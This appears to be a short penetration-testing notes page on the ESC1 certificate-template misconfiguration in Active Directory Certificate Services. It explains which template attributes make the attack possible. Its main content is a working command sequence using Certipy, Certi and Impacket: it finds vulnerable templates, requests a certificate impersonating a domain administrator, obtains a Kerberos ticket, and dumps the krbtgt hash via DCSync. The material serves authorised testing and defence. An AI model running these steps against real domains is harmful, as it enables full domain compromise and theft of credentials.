🐱‍💻 nix

ESC1

2 min read

ESC1

What makes a template vulnerable to ESC1 is when the following requirements are met:

AttributesValue
msPKI-Certificate-Name-Flag(0x1) ENROLLEE_SUPPLIES_SUBJECT
pKIExtendedKeyUsageClient Authentication
msPKI-Certificate-Application-PolicyClient Authentication
Enrollment RightsDomain Users

Note that you would require one valid user to enroll the certificate

  1. List for available vulnerable templates using certi
# Certipy
certipy find -u peter@range.net -p Password123 -dc-ip 192.168.86.183 -vulnerable -enabled -stdout
 
# Certi
python3 certi.py list range.net/peter:'Welcome1234' --dc-ip 10.8.0.2 --vuln --enabled
 
# output should normally be like this
Name: VulnUser
Schema Version: 2
Enroll Services: range-CA01-CA
Vulnerabilities: ESC1 - SAN Impersonation
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
msPKI-Enrollment-Flag: (0x9) INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
msPKI-RA-Signature: 0
pKIExtendedKeyUsage: Client Authentication, Secure Email, Encrypting File System
msPKI-Certificate-Application-Policy: Client Authentication, Secure Email, Encrypting File System
SD Owner: S-1-5-21-3556610642-5733621-2059236447-500 range\Administrator
Permissions
  Enrollment Permissions
    Enrollment Rights
      S-1-5-21-3556610642-5733621-2059236447-512 range\Domain Admins
      S-1-5-21-3556610642-5733621-2059236447-513 range\Domain Users
      S-1-5-21-3556610642-5733621-2059236447-519 range\Enterprise Admins
[[..snip..]]
  1. If requirements are met, then request the certificate using certi by specifying alternate name that include a high privileged user (ie Domain Admins)
# Certi
python3 certi.py req range.net/peter:'Welcome1234'@CA01.range.net range-CA01-CA -k -n --template 'VulnUser' --alt-name 'rangeadm'
 
# Certipy
certipy req -u peter@range.net -p Password123 -target ca01.range.net -ca 'range-CA01-CA' -template 'VulnUser' -upn 'Administrator@range.net'
  1. A pfx certificate should now be retrieved. Run the following command to request tgt by using the ceritifcate by using gettgtpkinit.py
# impacket
python3 gettgtpkinit.py range.net/rangeadm -cert-pfx /opt/certi/rangeadm@range.net.pfx -pfx-pass 'admin' -dc-ip 10.8.0.2 /tmp/rangeadm.ccache
 
# certipy
certipy auth -pfx administrator.pfx -dc-ip 192.168.86.183
  1. Now a ccache file should now be retrieved. Export the ccache file into KRB5CCNAME environment variable and DCSync
secretsdump.py range.net/rangeadm@10.8.0.2 -k -no-pass -just-dc -just-dc-user 'range\krbtgt'

Note that you could also recover ntlm has with getnthash.py script

Backlinks